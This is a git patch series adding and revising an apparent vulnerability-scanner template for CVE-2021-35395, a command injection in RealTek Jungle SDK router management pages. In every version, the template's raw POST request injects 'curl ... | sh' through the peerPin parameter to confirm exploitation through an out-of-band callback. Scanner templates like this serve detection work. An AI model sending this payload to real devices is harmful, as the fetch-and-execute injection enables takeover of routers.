From 5416d4cf329c11838422b440edc93c0d5deffb74 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Thu, 5 Oct 2023 11:21:04 -0500 Subject: [PATCH 1/4] Create CVE-2021-35395 template --- http/cves/2021/CVE-2021-35395.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2021/CVE-2021-35395.yaml diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml new file mode 100644 index 000000000000..ec5e4d936572 --- /dev/null +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-35395 +info: + name: RealTek Jungle SDK - Arbitrary Command Injection + author: king-alexander + severity: critical + description: There is a command injection vulnerability on the "formWsc" page of the management interface. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-35395 + - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities + tags: cve,kev + +http: + - raw: + - | + POST /goform/formWsc HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value. + submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" From e88448fa2cf175d055100a5c4561f57ac4f72f40 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Thu, 5 Oct 2023 11:41:33 -0500 Subject: [PATCH 2/4] Fix indentation and trailing whitespace --- http/cves/2021/CVE-2021-35395.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index ec5e4d936572..d766f8c815c6 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -11,12 +11,12 @@ info: http: - raw: - - | + - | POST /goform/formWsc HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value. - submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= + submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= matchers: - type: word From 47869080a6e0da64b44015fb0b97ebea08432019 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 8 Oct 2023 12:50:07 +0530 Subject: [PATCH 3/4] updated template --- http/cves/2021/CVE-2021-35395.yaml | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index d766f8c815c6..e935387abdb9 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -1,13 +1,18 @@ id: CVE-2021-35395 + info: name: RealTek Jungle SDK - Arbitrary Command Injection author: king-alexander severity: critical description: There is a command injection vulnerability on the "formWsc" page of the management interface. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. + remediation: | + Apply the latest security patches or updates provided by RealTek to fix the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-35395 - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities - tags: cve,kev + tags: cve,cve2021,realtek,rce,kev http: - raw: @@ -18,8 +23,14 @@ http: # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value. submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" From ed665729a0064032b79e8029b71045c8a75daff8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 10 Nov 2023 16:15:16 +0530 Subject: [PATCH 4/4] Update CVE-2021-35395.yaml --- http/cves/2021/CVE-2021-35395.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index e935387abdb9..1a813857911f 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -4,14 +4,14 @@ info: name: RealTek Jungle SDK - Arbitrary Command Injection author: king-alexander severity: critical - description: There is a command injection vulnerability on the "formWsc" page of the management interface. - impact: | - Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. - remediation: | - Apply the latest security patches or updates provided by RealTek to fix the vulnerability. + remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability. + description: | + There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-35395 - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities + metadata: + max-request: 1 tags: cve,cve2021,realtek,rce,kev http: @@ -20,7 +20,7 @@ http: POST /goform/formWsc HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value. + submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= matchers-condition: and